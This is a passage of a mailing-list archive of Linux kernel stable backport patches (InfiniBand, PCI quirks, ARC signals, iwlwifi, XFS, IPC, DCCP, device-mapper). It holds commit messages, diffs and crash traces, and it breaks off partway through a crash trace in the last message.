--- a/drivers/infiniband/ulp/ipoib/ipoib.h
+++ b/drivers/infiniband/ulp/ipoib/ipoib.h
@@ -460,6 +460,7 @@ void ipoib_send(struct net_device *dev, struct sk_buff *skb,
struct ipoib_ah *address, u32 qpn);
void ipoib_reap_ah(struct work_struct *work);

+struct ipoib_path *__path_find(struct net_device *dev, void *gid);
void ipoib_mark_paths_invalid(struct net_device *dev);
void ipoib_flush_paths(struct net_device *dev);
struct ipoib_dev_priv *ipoib_intf_alloc(const char *format);
diff --git a/drivers/infiniband/ulp/ipoib/ipoib_cm.c b/drivers/infiniband/ulp/ipoib/ipoib_cm.c
index 3eceb61..aa9ad2d 100644
--- a/drivers/infiniband/ulp/ipoib/ipoib_cm.c
+++ b/drivers/infiniband/ulp/ipoib/ipoib_cm.c
@@ -1290,6 +1290,8 @@ void ipoib_cm_destroy_tx(struct ipoib_cm_tx *tx)
}
}

+#define QPN_AND_OPTIONS_OFFSET 4
+
static void ipoib_cm_tx_start(struct work_struct *work)
{
struct ipoib_dev_priv *priv = container_of(work, struct ipoib_dev_priv,
@@ -1298,6 +1300,7 @@ static void ipoib_cm_tx_start(struct work_struct *work)
struct ipoib_neigh *neigh;
struct ipoib_cm_tx *p;
unsigned long flags;
+ struct ipoib_path *path;
int ret;

struct ib_sa_path_rec pathrec;
@@ -1310,7 +1313,19 @@ static void ipoib_cm_tx_start(struct work_struct *work)
p = list_entry(priv->cm.start_list.next, typeof(*p), list);
list_del_init(&p->list);
neigh = p->neigh;
+
qpn = IPOIB_QPN(neigh->daddr);
+ /*
+ * As long as the search is with these 2 locks,
+ * path existence indicates its validity.
+ */
+ path = __path_find(dev, neigh->daddr + QPN_AND_OPTIONS_OFFSET);
+ if (!path) {
+ pr_info("%s ignore not valid path %pI6\n",
+ __func__,
+ neigh->daddr + QPN_AND_OPTIONS_OFFSET);
+ goto free_neigh;
+ }
memcpy(&pathrec, &p->path->pathrec, sizeof pathrec);

spin_unlock_irqrestore(&priv->lock, flags);
@@ -1322,6 +1337,7 @@ static void ipoib_cm_tx_start(struct work_struct *work)
spin_lock_irqsave(&priv->lock, flags);

if (ret) {
+free_neigh:
neigh = p->neigh;
if (neigh) {
neigh->cm = NULL;
diff --git a/drivers/infiniband/ulp/ipoib/ipoib_main.c b/drivers/infiniband/ulp/ipoib/ipoib_main.c
index a481094..375f9ed 100644
--- a/drivers/infiniband/ulp/ipoib/ipoib_main.c
+++ b/drivers/infiniband/ulp/ipoib/ipoib_main.c
@@ -251,7 +251,7 @@ int ipoib_set_mode(struct net_device *dev, const char *buf)
return -EINVAL;
}

-static struct ipoib_path *__path_find(struct net_device *dev, void *gid)
+struct ipoib_path *__path_find(struct net_device *dev, void *gid)
{
struct ipoib_dev_priv *priv = netdev_priv(dev);
struct rb_node *n = priv->path_tree.rb_node;
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:08 PM2/5/17
to
From: Myron Stowe <myron...@redhat.com>

commit 06cf35f903aa6da0cc8d9f81e9bcd1f7e1b534bb upstream.

Some AMD CS553x devices have read-only BARs because of a firmware or
hardware defect. There's a workaround in quirk_cs5536_vsa(), but it no
longer works after 36e8164882ca ("PCI: Restore detection of read-only
BARs"). Prior to 36e8164882ca, we filled in res->start; afterwards we
leave it zeroed out. The quirk only updated the size, so the driver tried
to use a region starting at zero, which didn't work.

Expand quirk_cs5536_vsa() to read the base addresses from the BARs and
hard-code the sizes.

On Nix's system BAR 2's read-only value is 0x6200. Prior to 36e8164882ca,
we interpret that as a 512-byte BAR based on the lowest-order bit set. Per
datasheet sec 5.6.1, that BAR (MFGPT) requires only 64 bytes; use that to
avoid clearing any address bits if a platform uses only 64-byte alignment.

[js] pcibios_bus_to_resource takes pdev, not bus in 3.12

[bhelgaas: changelog, reduce BAR 2 size to 64]
Fixes: 36e8164882ca ("PCI: Restore detection of read-only BARs")
Link: https://bugzilla.kernel.org/show_bug.cgi?id=85991#c4
Link: http://support.amd.com/TechDocs/31506_cs5535_databook.pdf
Link: http://support.amd.com/TechDocs/33238G_cs5536_db.pdf
Reported-and-tested-by: Nix <n...@esperi.org.uk>
Signed-off-by: Myron Stowe <myron...@redhat.com>
Signed-off-by: Bjorn Helgaas <bhel...@google.com>
Signed-off-by: Jiri Slaby <jsl...@suse.cz>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/pci/quirks.c | 41 +++++++++++++++++++++++++++++++++++++----
1 file changed, 37 insertions(+), 4 deletions(-)

diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
index a663715..b6625e5 100644
--- a/drivers/pci/quirks.c
+++ b/drivers/pci/quirks.c
@@ -339,19 +339,52 @@ static void quirk_s3_64M(struct pci_dev *dev)
DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_S3, PCI_DEVICE_ID_S3_868, quirk_s3_64M);
DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_S3, PCI_DEVICE_ID_S3_968, quirk_s3_64M);

+static void quirk_io(struct pci_dev *dev, int pos, unsigned size,
+ const char *name)
+{
+ u32 region;
+ struct pci_bus_region bus_region;
+ struct resource *res = dev->resource + pos;
+
+ pci_read_config_dword(dev, PCI_BASE_ADDRESS_0 + (pos << 2), &region);
+
+ if (!region)
+ return;
+
+ res->name = pci_name(dev);
+ res->flags = region & ~PCI_BASE_ADDRESS_IO_MASK;
+ res->flags |=
+ (IORESOURCE_IO | IORESOURCE_PCI_FIXED | IORESOURCE_SIZEALIGN);
+ region &= ~(size - 1);
+
+ /* Convert from PCI bus to resource space */
+ bus_region.start = region;
+ bus_region.end = region + size - 1;
+ pcibios_bus_to_resource(dev, res, &bus_region);
+
+ dev_info(&dev->dev, FW_BUG "%s quirk: reg 0x%x: %pR\n",
+ name, PCI_BASE_ADDRESS_0 + (pos << 2), res);
+}
+
/*
* Some CS5536 BIOSes (for example, the Soekris NET5501 board w/ comBIOS
* ver. 1.33 20070103) don't set the correct ISA PCI region header info.
* BAR0 should be 8 bytes; instead, it may be set to something like 8k
* (which conflicts w/ BAR1's memory range).
+ *
+ * CS553x's ISA PCI BARs may also be read-only (ref:
+ * https://bugzilla.kernel.org/show_bug.cgi?id=85991 - Comment #4 forward).
*/
static void quirk_cs5536_vsa(struct pci_dev *dev)
{
+ static char *name = "CS5536 ISA bridge";
+
if (pci_resource_len(dev, 0) != 8) {
- struct resource *res = &dev->resource[0];
- res->end = res->start + 8 - 1;
- dev_info(&dev->dev, "CS5536 ISA bridge bug detected "
- "(incorrect header); workaround applied.\n");
+ quirk_io(dev, 0, 8, name); /* SMB */
+ quirk_io(dev, 1, 256, name); /* GPIO */
+ quirk_io(dev, 2, 64, name); /* MFGPT */
+ dev_info(&dev->dev, "%s bug detected (incorrect header); workaround applied\n",
+ name);
}
}
DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_CS5536_ISA, quirk_cs5536_vsa);
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:09 PM2/5/17
to
From: Al Viro <vi...@zeniv.linux.org.uk>

commit 7798bf2140ebcc36eafec6a4194fffd8d585d471 upstream.

On faulting sigreturn we do get SIGSEGV, all right, but anything
we'd put into pt_regs could end up in the coredump. And since
__copy_from_user() never zeroed on arc, we'd better bugger off
on its failure without copying random uninitialized bits of
kernel stack into pt_regs...

Signed-off-by: Al Viro <vi...@zeniv.linux.org.uk>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
arch/arc/kernel/signal.c | 11 ++++++-----
1 file changed, 6 insertions(+), 5 deletions(-)

diff --git a/arch/arc/kernel/signal.c b/arch/arc/kernel/signal.c
index 6763654..0823087 100644
--- a/arch/arc/kernel/signal.c
+++ b/arch/arc/kernel/signal.c
@@ -80,13 +80,14 @@ static int restore_usr_regs(struct pt_regs *regs, struct rt_sigframe __user *sf)
int err;

err = __copy_from_user(&set, &sf->uc.uc_sigmask, sizeof(set));
- if (!err)
- set_current_blocked(&set);
-
- err |= __copy_from_user(regs, &(sf->uc.uc_mcontext.regs),
+ err |= __copy_from_user(regs, &(sf->uc.uc_mcontext.regs.scratch),
sizeof(sf->uc.uc_mcontext.regs.scratch));
+ if (err)
+ return err;

- return err;
+ set_current_blocked(&set);
+
+ return 0;
}

static inline int is_do_ss_needed(unsigned int magic)
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:09 PM2/5/17
to
From: Peter Zijlstra <pet...@infradead.org>

commit 7bd3e239d6c6d1cad276e8f130b386df4234dcd7 upstream.

The fact that volatile allows for atomic load/stores is a special case
not a requirement for {READ,WRITE}_ONCE(). Their primary purpose is to
force the compiler to emit load/stores _once_.

Signed-off-by: Peter Zijlstra (Intel) <pet...@infradead.org>
Acked-by: Christian Borntraeger <bornt...@de.ibm.com>
Acked-by: Will Deacon <will....@arm.com>
Acked-by: Linus Torvalds <torv...@linux-foundation.org>
Cc: Davidlohr Bueso <da...@stgolabs.net>
Cc: H. Peter Anvin <h...@zytor.com>
Cc: Paul McKenney <pau...@linux.vnet.ibm.com>
Cc: Stephen Rothwell <s...@canb.auug.org.au>
Cc: Thomas Gleixner <tg...@linutronix.de>
Signed-off-by: Ingo Molnar <mi...@kernel.org>
[wt: backported only for next patch]

Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
include/linux/compiler.h | 16 ----------------
1 file changed, 16 deletions(-)

diff --git a/include/linux/compiler.h b/include/linux/compiler.h
index c6d06e9..53563d8 100644
--- a/include/linux/compiler.h
+++ b/include/linux/compiler.h
@@ -181,29 +181,16 @@ void ftrace_likely_update(struct ftrace_branch_data *f, int val, int expect);

#include <uapi/linux/types.h>

-static __always_inline void data_access_exceeds_word_size(void)
-#ifdef __compiletime_warning
-__compiletime_warning("data access exceeds word size and won't be atomic")
-#endif
-;
-
-static __always_inline void data_access_exceeds_word_size(void)
-{
-}
-
static __always_inline void __read_once_size(const volatile void *p, void *res, int size)
{
switch (size) {
case 1: *(__u8 *)res = *(volatile __u8 *)p; break;
case 2: *(__u16 *)res = *(volatile __u16 *)p; break;
case 4: *(__u32 *)res = *(volatile __u32 *)p; break;
-#ifdef CONFIG_64BIT
case 8: *(__u64 *)res = *(volatile __u64 *)p; break;
-#endif
default:
barrier();
__builtin_memcpy((void *)res, (const void *)p, size);
- data_access_exceeds_word_size();
barrier();
}
}
@@ -214,13 +201,10 @@ static __always_inline void __write_once_size(volatile void *p, void *res, int s
case 1: *(volatile __u8 *)p = *(__u8 *)res; break;
case 2: *(volatile __u16 *)p = *(__u16 *)res; break;
case 4: *(volatile __u32 *)p = *(__u32 *)res; break;
-#ifdef CONFIG_64BIT
case 8: *(volatile __u64 *)p = *(__u64 *)res; break;
-#endif
default:
barrier();
__builtin_memcpy((void *)p, (const void *)res, size);
- data_access_exceeds_word_size();
barrier();
}
}
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:09 PM2/5/17
to
From: Sara Sharon <sara....@intel.com>

commit d5d0689aefc59c6a5352ca25d7e6d47d03f543ce upstream.

This fixes a pretty ancient bug that hasn't manifested itself
until now.
The scratchbuf for command queue is allocated only for 32 slots
but is accessed with the queue write pointer - which can be
up to 256.
Since the scratch buf size was 16 and there are up to 256 TFDs
we never passed a page boundary when accessing the scratch buffer,
but when attempting to increase the size of the scratch buffer a
panic was quick to follow when trying to access the address resulted
in a page boundary.

Signed-off-by: Sara Sharon <sara....@intel.com>
Fixes: 38c0f334b359 ("iwlwifi: use coherent DMA memory for command header")
Signed-off-by: Luca Coelho <luciano...@intel.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/net/wireless/iwlwifi/pcie/tx.c | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/net/wireless/iwlwifi/pcie/tx.c b/drivers/net/wireless/iwlwifi/pcie/tx.c
index f05962c..2e3a0d7 100644
--- a/drivers/net/wireless/iwlwifi/pcie/tx.c
+++ b/drivers/net/wireless/iwlwifi/pcie/tx.c
@@ -1311,9 +1311,9 @@ static int iwl_pcie_enqueue_hcmd(struct iwl_trans *trans,

/* start the TFD with the scratchbuf */
scratch_size = min_t(int, copy_size, IWL_HCMD_SCRATCHBUF_SIZE);
- memcpy(&txq->scratchbufs[q->write_ptr], &out_cmd->hdr, scratch_size);
+ memcpy(&txq->scratchbufs[idx], &out_cmd->hdr, scratch_size);
iwl_pcie_txq_build_tfd(trans, txq,
- iwl_pcie_get_scratchbuf_dma(txq, q->write_ptr),
+ iwl_pcie_get_scratchbuf_dma(txq, idx),
scratch_size, 1);

/* map first command fragment, if any remains */
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:09 PM2/5/17
to
From: "Darrick J. Wong" <darric...@oracle.com>

commit 58d789678546d46d7bbd809dd7dab417c0f23655 upstream.

The function xfs_calc_dquots_per_chunk takes a parameter in units
of basic blocks. The kernel seems to get the units wrong, but
userspace got 'fixed' by commenting out the unnecessary conversion.
Fix both.

Signed-off-by: Darrick J. Wong <darric...@oracle.com>
Reviewed-by: Eric Sandeen <san...@redhat.com>
Signed-off-by: Dave Chinner <da...@fromorbit.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
fs/xfs/xfs_dquot.c | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/fs/xfs/xfs_dquot.c b/fs/xfs/xfs_dquot.c
index bac3e16..e59f309 100644
--- a/fs/xfs/xfs_dquot.c
+++ b/fs/xfs/xfs_dquot.c
@@ -309,8 +309,7 @@ xfs_dquot_buf_verify_crc(
if (mp->m_quotainfo)
ndquots = mp->m_quotainfo->qi_dqperchunk;
else
- ndquots = xfs_qm_calc_dquots_per_chunk(mp,
- XFS_BB_TO_FSB(mp, bp->b_length));
+ ndquots = xfs_qm_calc_dquots_per_chunk(mp, bp->b_length);

for (i = 0; i < ndquots; i++, d++) {
if (!xfs_verify_cksum((char *)d, sizeof(struct xfs_dqblk),
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:40:10 PM2/5/17
to
From: Joe Perches <j...@perches.com>

commit 7f032d6ef6154868a2a5d5f6b2c3f8587292196c upstream.

The seq_printf return value, because it's frequently misused,
will eventually be converted to void.

See: commit 1f33c41c03da ("seq_file: Rename seq_overflow() to
seq_has_overflowed() and make public")

Signed-off-by: Joe Perches <j...@perches.com>
Signed-off-by: Andrew Morton <ak...@linux-foundation.org>
Signed-off-by: Linus Torvalds <torv...@linux-foundation.org>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
ipc/msg.c | 34 ++++++++++++++++++----------------
ipc/sem.c | 26 ++++++++++++++------------
ipc/shm.c | 42 ++++++++++++++++++++++--------------------
ipc/util.c | 6 ++++--
4 files changed, 58 insertions(+), 50 deletions(-)

diff --git a/ipc/msg.c b/ipc/msg.c
index 32aaaab..9ce27d8 100644
--- a/ipc/msg.c
+++ b/ipc/msg.c
@@ -1046,21 +1046,23 @@ static int sysvipc_msg_proc_show(struct seq_file *s, void *it)
struct user_namespace *user_ns = seq_user_ns(s);
struct msg_queue *msq = it;

- return seq_printf(s,
- "%10d %10d %4o %10lu %10lu %5u %5u %5u %5u %5u %5u %10lu %10lu %10lu\n",
- msq->q_perm.key,
- msq->q_perm.id,
- msq->q_perm.mode,
- msq->q_cbytes,
- msq->q_qnum,
- msq->q_lspid,
- msq->q_lrpid,
- from_kuid_munged(user_ns, msq->q_perm.uid),
- from_kgid_munged(user_ns, msq->q_perm.gid),
- from_kuid_munged(user_ns, msq->q_perm.cuid),
- from_kgid_munged(user_ns, msq->q_perm.cgid),
- msq->q_stime,
- msq->q_rtime,
- msq->q_ctime);
+ seq_printf(s,
+ "%10d %10d %4o %10lu %10lu %5u %5u %5u %5u %5u %5u %10lu %10lu %10lu\n",
+ msq->q_perm.key,
+ msq->q_perm.id,
+ msq->q_perm.mode,
+ msq->q_cbytes,
+ msq->q_qnum,
+ msq->q_lspid,
+ msq->q_lrpid,
+ from_kuid_munged(user_ns, msq->q_perm.uid),
+ from_kgid_munged(user_ns, msq->q_perm.gid),
+ from_kuid_munged(user_ns, msq->q_perm.cuid),
+ from_kgid_munged(user_ns, msq->q_perm.cgid),
+ msq->q_stime,
+ msq->q_rtime,
+ msq->q_ctime);
+
+ return 0;
}
#endif
diff --git a/ipc/sem.c b/ipc/sem.c
index 47a1519..57242be 100644
--- a/ipc/sem.c
+++ b/ipc/sem.c
@@ -2172,17 +2172,19 @@ static int sysvipc_sem_proc_show(struct seq_file *s, void *it)

sem_otime = get_semotime(sma);

- return seq_printf(s,
- "%10d %10d %4o %10u %5u %5u %5u %5u %10lu %10lu\n",
- sma->sem_perm.key,
- sma->sem_perm.id,
- sma->sem_perm.mode,
- sma->sem_nsems,
- from_kuid_munged(user_ns, sma->sem_perm.uid),
- from_kgid_munged(user_ns, sma->sem_perm.gid),
- from_kuid_munged(user_ns, sma->sem_perm.cuid),
- from_kgid_munged(user_ns, sma->sem_perm.cgid),
- sem_otime,
- sma->sem_ctime);
+ seq_printf(s,
+ "%10d %10d %4o %10u %5u %5u %5u %5u %10lu %10lu\n",
+ sma->sem_perm.key,
+ sma->sem_perm.id,
+ sma->sem_perm.mode,
+ sma->sem_nsems,
+ from_kuid_munged(user_ns, sma->sem_perm.uid),
+ from_kgid_munged(user_ns, sma->sem_perm.gid),
+ from_kuid_munged(user_ns, sma->sem_perm.cuid),
+ from_kgid_munged(user_ns, sma->sem_perm.cgid),
+ sem_otime,
+ sma->sem_ctime);
+
+ return 0;
}
#endif
diff --git a/ipc/shm.c b/ipc/shm.c
index 08b14f6..1f141c9 100644
--- a/ipc/shm.c
+++ b/ipc/shm.c
@@ -1331,25 +1331,27 @@ static int sysvipc_shm_proc_show(struct seq_file *s, void *it)
#define SIZE_SPEC "%21lu"
#endif

- return seq_printf(s,
- "%10d %10d %4o " SIZE_SPEC " %5u %5u "
- "%5lu %5u %5u %5u %5u %10lu %10lu %10lu "
- SIZE_SPEC " " SIZE_SPEC "\n",
- shp->shm_perm.key,
- shp->shm_perm.id,
- shp->shm_perm.mode,
- shp->shm_segsz,
- shp->shm_cprid,
- shp->shm_lprid,
- shp->shm_nattch,
- from_kuid_munged(user_ns, shp->shm_perm.uid),
- from_kgid_munged(user_ns, shp->shm_perm.gid),
- from_kuid_munged(user_ns, shp->shm_perm.cuid),
- from_kgid_munged(user_ns, shp->shm_perm.cgid),
- shp->shm_atim,
- shp->shm_dtim,
- shp->shm_ctim,
- rss * PAGE_SIZE,
- swp * PAGE_SIZE);
+ seq_printf(s,
+ "%10d %10d %4o " SIZE_SPEC " %5u %5u "
+ "%5lu %5u %5u %5u %5u %10lu %10lu %10lu "
+ SIZE_SPEC " " SIZE_SPEC "\n",
+ shp->shm_perm.key,
+ shp->shm_perm.id,
+ shp->shm_perm.mode,
+ shp->shm_segsz,
+ shp->shm_cprid,
+ shp->shm_lprid,
+ shp->shm_nattch,
+ from_kuid_munged(user_ns, shp->shm_perm.uid),
+ from_kgid_munged(user_ns, shp->shm_perm.gid),
+ from_kuid_munged(user_ns, shp->shm_perm.cuid),
+ from_kgid_munged(user_ns, shp->shm_perm.cgid),
+ shp->shm_atim,
+ shp->shm_dtim,
+ shp->shm_ctim,
+ rss * PAGE_SIZE,
+ swp * PAGE_SIZE);
+
+ return 0;
}
#endif
diff --git a/ipc/util.c b/ipc/util.c
index 7353425..cc10689 100644
--- a/ipc/util.c
+++ b/ipc/util.c
@@ -904,8 +904,10 @@ static int sysvipc_proc_show(struct seq_file *s, void *it)
struct ipc_proc_iter *iter = s->private;
struct ipc_proc_iface *iface = iter->iface;

- if (it == SEQ_START_TOKEN)
- return seq_puts(s, iface->header);
+ if (it == SEQ_START_TOKEN) {
+ seq_puts(s, iface->header);
+ return 0;
+ }

return iface->show(s, it);
}
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:50:05 PM2/5/17
to
From: Markus Elfring <elf...@users.sourceforge.net>

commit 5f0163a5ee9cc7c59751768bdfd94a73186debba upstream.

The put_device() function tests whether its argument is NULL and then
returns immediately. Thus the test around the call is not needed.

This issue was detected by using the Coccinelle software.

Signed-off-by: Markus Elfring <elf...@users.sourceforge.net>
Signed-off-by: Greg Kroah-Hartman <gre...@linuxfoundation.org>
[wt: backported only to ease next patch as suggested by Jiri]

Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/base/core.c | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/drivers/base/core.c b/drivers/base/core.c
index 2a19097..d92ecf3 100644
--- a/drivers/base/core.c
+++ b/drivers/base/core.c
@@ -1138,8 +1138,7 @@ done:
kobject_del(&dev->kobj);
Error:
cleanup_device_parent(dev);
- if (parent)
- put_device(parent);
+ put_device(parent);
name_error:
kfree(dev->p);
dev->p = NULL;
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:50:05 PM2/5/17
to
From: Eric Dumazet <edum...@google.com>

commit 1aa9d1a0e7eefcc61696e147d123453fc0016005 upstream.

dccp_v6_err() does not use pskb_may_pull() and might access garbage.

We only need 4 bytes at the beginning of the DCCP header, like TCP,
so the 8 bytes pulled in icmpv6_notify() are more than enough.

Signed-off-by: Eric Dumazet <edum...@google.com>
Signed-off-by: David S. Miller <da...@davemloft.net>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
net/dccp/ipv6.c | 15 ++++++++-------
1 file changed, 8 insertions(+), 7 deletions(-)

diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
index 6cf9f77..fb72107 100644
--- a/net/dccp/ipv6.c
+++ b/net/dccp/ipv6.c
@@ -83,7 +83,7 @@ static void dccp_v6_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
u8 type, u8 code, int offset, __be32 info)
{
const struct ipv6hdr *hdr = (const struct ipv6hdr *)skb->data;
- const struct dccp_hdr *dh = (struct dccp_hdr *)(skb->data + offset);
+ const struct dccp_hdr *dh;
struct dccp_sock *dp;
struct ipv6_pinfo *np;
struct sock *sk;
@@ -91,12 +91,13 @@ static void dccp_v6_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
__u64 seq;
struct net *net = dev_net(skb->dev);

- if (skb->len < offset + sizeof(*dh) ||
- skb->len < offset + __dccp_basic_hdr_len(dh)) {
- ICMP6_INC_STATS_BH(net, __in6_dev_get(skb->dev),
- ICMP6_MIB_INERRORS);
- return;
- }
+ /* Only need dccph_dport & dccph_sport which are the first
+ * 4 bytes in dccp header.
+ * Our caller (icmpv6_notify()) already pulled 8 bytes for us.
+ */
+ BUILD_BUG_ON(offsetofend(struct dccp_hdr, dccph_sport) > 8);
+ BUILD_BUG_ON(offsetofend(struct dccp_hdr, dccph_dport) > 8);
+ dh = (struct dccp_hdr *)(skb->data + offset);

sk = inet6_lookup(net, &dccp_hashinfo,
&hdr->daddr, dh->dccph_dport,
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:50:05 PM2/5/17
to
From: Bart Van Assche <bart.va...@sandisk.com>

commit 51093254bf879bc9ce96590400a87897c7498463 upstream.

Let the target core check task existence instead of the SRP target
driver. Additionally, let the target core check the validity of the
task management request instead of the ib_srpt driver.

This patch fixes the following kernel crash:

BUG: unable to handle kernel NULL pointer dereference at 0000000000000001
IP: [<ffffffffa0565f37>] srpt_handle_new_iu+0x6d7/0x790 [ib_srpt]
Oops: 0002 [#1] SMP
Call Trace:
[<ffffffffa05660ce>] srpt_process_completion+0xde/0x570 [ib_srpt]
[<ffffffffa056669f>] srpt_compl_thread+0x13f/0x160 [ib_srpt]
[<ffffffff8109726f>] kthread+0xcf/0xe0
[<ffffffff81613cfc>] ret_from_fork+0x7c/0xb0

Signed-off-by: Bart Van Assche <bart.va...@sandisk.com>
Fixes: 3e4f574857ee ("ib_srpt: Convert TMR path to target_submit_tmr")
Tested-by: Alex Estrin <alex....@intel.com>
Reviewed-by: Christoph Hellwig <h...@lst.de>
Cc: Nicholas Bellinger <n...@linux-iscsi.org>
Cc: Sagi Grimberg <sa...@mellanox.com>
Cc: stable <sta...@vger.kernel.org>
Signed-off-by: Doug Ledford <dled...@redhat.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/infiniband/ulp/srpt/ib_srpt.c | 59 +----------------------------------
1 file changed, 1 insertion(+), 58 deletions(-)

diff --git a/drivers/infiniband/ulp/srpt/ib_srpt.c b/drivers/infiniband/ulp/srpt/ib_srpt.c
index fcf9f87..1e79114 100644
--- a/drivers/infiniband/ulp/srpt/ib_srpt.c
+++ b/drivers/infiniband/ulp/srpt/ib_srpt.c
@@ -1754,47 +1754,6 @@ send_sense:
return -1;
}

-/**
- * srpt_rx_mgmt_fn_tag() - Process a task management function by tag.
- * @ch: RDMA channel of the task management request.
- * @fn: Task management function to perform.
- * @req_tag: Tag of the SRP task management request.
- * @mgmt_ioctx: I/O context of the task management request.
- *
- * Returns zero if the target core will process the task management
- * request asynchronously.
- *
- * Note: It is assumed that the initiator serializes tag-based task management
- * requests.
- */
-static int srpt_rx_mgmt_fn_tag(struct srpt_send_ioctx *ioctx, u64 tag)
-{
- struct srpt_device *sdev;
- struct srpt_rdma_ch *ch;
- struct srpt_send_ioctx *target;
- int ret, i;
-
- ret = -EINVAL;
- ch = ioctx->ch;
- BUG_ON(!ch);
- BUG_ON(!ch->sport);
- sdev = ch->sport->sdev;
- BUG_ON(!sdev);
- spin_lock_irq(&sdev->spinlock);
- for (i = 0; i < ch->rq_size; ++i) {
- target = ch->ioctx_ring[i];
- if (target->cmd.se_lun == ioctx->cmd.se_lun &&
- target->tag == tag &&
- srpt_get_cmd_state(target) != SRPT_STATE_DONE) {
- ret = 0;
- /* now let the target core abort &target->cmd; */
- break;
- }
- }
- spin_unlock_irq(&sdev->spinlock);
- return ret;
-}
-
static int srp_tmr_to_tcm(int fn)
{
switch (fn) {
@@ -1829,7 +1788,6 @@ static void srpt_handle_tsk_mgmt(struct srpt_rdma_ch *ch,
struct se_cmd *cmd;
struct se_session *sess = ch->sess;
uint64_t unpacked_lun;
- uint32_t tag = 0;
int tcm_tmr;
int rc;

@@ -1845,25 +1803,10 @@ static void srpt_handle_tsk_mgmt(struct srpt_rdma_ch *ch,
srpt_set_cmd_state(send_ioctx, SRPT_STATE_MGMT);
send_ioctx->tag = srp_tsk->tag;
tcm_tmr = srp_tmr_to_tcm(srp_tsk->tsk_mgmt_func);
- if (tcm_tmr < 0) {
- send_ioctx->cmd.se_tmr_req->response =
- TMR_TASK_MGMT_FUNCTION_NOT_SUPPORTED;
- goto fail;
- }
unpacked_lun = srpt_unpack_lun((uint8_t *)&srp_tsk->lun,
sizeof(srp_tsk->lun));
-
- if (srp_tsk->tsk_mgmt_func == SRP_TSK_ABORT_TASK) {
- rc = srpt_rx_mgmt_fn_tag(send_ioctx, srp_tsk->task_tag);
- if (rc < 0) {
- send_ioctx->cmd.se_tmr_req->response =
- TMR_TASK_DOES_NOT_EXIST;
- goto fail;
- }
- tag = srp_tsk->task_tag;
- }
rc = target_submit_tmr(&send_ioctx->cmd, sess, NULL, unpacked_lun,
- srp_tsk, tcm_tmr, GFP_KERNEL, tag,
+ srp_tsk, tcm_tmr, GFP_KERNEL, srp_tsk->task_tag,
TARGET_SCF_ACK_KREF);
if (rc != 0) {
send_ioctx->cmd.se_tmr_req->response = TMR_FUNCTION_REJECTED;
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:50:05 PM2/5/17
to
From: Bart Van Assche <bart.va...@sandisk.com>

commit 3b785fbcf81c3533772c52b717f77293099498d3 upstream.

This avoids that new requests are queued while __dm_destroy() is in
progress.

[js] use md->queue instead of non-present helper

Signed-off-by: Bart Van Assche <bart.va...@sandisk.com>
Signed-off-by: Mike Snitzer <sni...@redhat.com>
Signed-off-by: Jiri Slaby <jsl...@suse.cz>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/md/dm.c | 5 +++++
1 file changed, 5 insertions(+)

diff --git a/drivers/md/dm.c b/drivers/md/dm.c
index f69fed8..a77ef6c 100644
--- a/drivers/md/dm.c
+++ b/drivers/md/dm.c
@@ -2323,6 +2323,7 @@ EXPORT_SYMBOL_GPL(dm_device_name);

static void __dm_destroy(struct mapped_device *md, bool wait)
{
+ struct request_queue *q = md->queue;
struct dm_table *map;

might_sleep();
@@ -2333,6 +2334,10 @@ static void __dm_destroy(struct mapped_device *md, bool wait)
set_bit(DMF_FREEING, &md->flags);
spin_unlock(&_minor_lock);

+ spin_lock_irq(q->queue_lock);
+ queue_flag_set(QUEUE_FLAG_DYING, q);
+ spin_unlock_irq(q->queue_lock);
+
/*
* Take suspend_lock so that presuspend and postsuspend methods
* do not race with internal suspend.
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:50:05 PM2/5/17
to
From: Vegard Nossum <vegard...@oracle.com>

commit 6b760bb2c63a9e322c0e4a0b5daf335ad93d5a33 upstream.

I got this:

divide error: 0000 [#1] PREEMPT SMP KASAN
CPU: 1 PID: 1327 Comm: a.out Not tainted 4.8.0-rc2+ #189
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.3-0-ge2fc41e-prebuilt.qemu-project.org 04/01/2014
task: ffff8801120a9580 task.stack: ffff8801120b0000
RIP: 0010:[<ffffffff82c8bd9a>] [<ffffffff82c8bd9a>] snd_hrtimer_callback+0x1da/0x3f0
RSP: 0018:ffff88011aa87da8 EFLAGS: 00010006
